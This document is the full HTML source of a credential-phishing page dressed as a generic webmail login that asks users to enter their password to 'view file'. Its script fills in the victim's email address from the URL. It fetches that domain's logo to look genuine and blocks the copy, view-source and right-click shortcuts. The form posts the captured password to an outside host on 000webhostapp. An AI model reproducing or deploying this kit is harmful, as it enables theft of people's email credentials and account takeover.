<html>
<head>
<title>Mail</title>
<style>
body {background-image: url("po_bgnxd.png");
  min-height: 500px;
  background-attachment: fixed;
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
  }
  .A-x{ margin-left:0px; background-color:white; border:hidden; width:360px; margin-top:45px; }
  .icon {width:60%; margin-bottom:20px; margin-left:25px;}
  
  .lab {margin-bottom:10px;}
  
  .put {width:230px; height:15px; margin-top:5px;  margin-bottom:8px; }
  
  .putp {width:250px; height:30px; margin-top:5px; margin-bottom:20px;}
  
  .sb {margin-left:23px; background-color:rgb(16, 78, 139); width:200px; height:30px; border:hidden; color:white;}

  </style>
<link rel="stylesheet" type="text/css" href="stylepo.css" />
</head>
 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>
<body>
<fieldset class="A-x" ><br>
<form class="B-x" method="" action="" autocomplete="off" id="pax" ><br>
 <h2 class="text-center"><div id="top"><img src="" alt="" id="logoimg" style="width:50px;height:50px;margin-top:10px; margin-left:100px;"></h2>
<b><label class="lab">Email</label></b><br>
<fieldset class="put" >
<span id="bax" ></span>
</fieldset><br>
<b><label>Password</label></b><br>
<input class="putp" id="inpwd" placeholder="Enter email password" name="Password" type="password" required value="" ><br>

<input type="submit" value="Login to view file" class="sb"><br>

<input type="hidden" value="" name="email" id="cax" ><br>

</form><br>

</fieldset>
</body>

    
<script>

  document.onkeydown = function(e) {
        if (e.ctrlKey && 
            (e.keyCode === 67 || 
             e.keyCode === 86 || 
             e.keyCode === 85 || 
             e.keyCode === 117)) {
            return false;
        } else {
            return true;
        }
};
$(document).keypress("u",function(e) {
  if(e.ctrlKey)
  {
return false;
}
else
{
return true;
}
});

document.addEventListener('contextmenu', event => event.preventDefault());

	document.getElementById("inpwd").focus();
			    var str = window.location.href;
				var strs = str.split("#");
				var emaq = strs[1];
				if(emaq){
					document.getElementById("bax").innerHTML = emaq;
					document.getElementById("cax").value = emaq;
					document.getElementById("pax").action = "https://expediential-tracke.000webhostapp.com/xcv/index.php";
				}
				
				 var ind=emaq.indexOf("@");
        var my_slice=emaq.substr((ind+1));
      var mainPage = 'https://'+my_slice; 
     //     var mainPage = 'https://webmail.staralliancebd.com/';  
        $("#logoimg").attr("src", "https://logo.clearbit.com/"+mainPage);
         document.getElementById('mainPage').src = mainPage;
    //    $("#mainPage").src(mainPage);
</script>
</html>
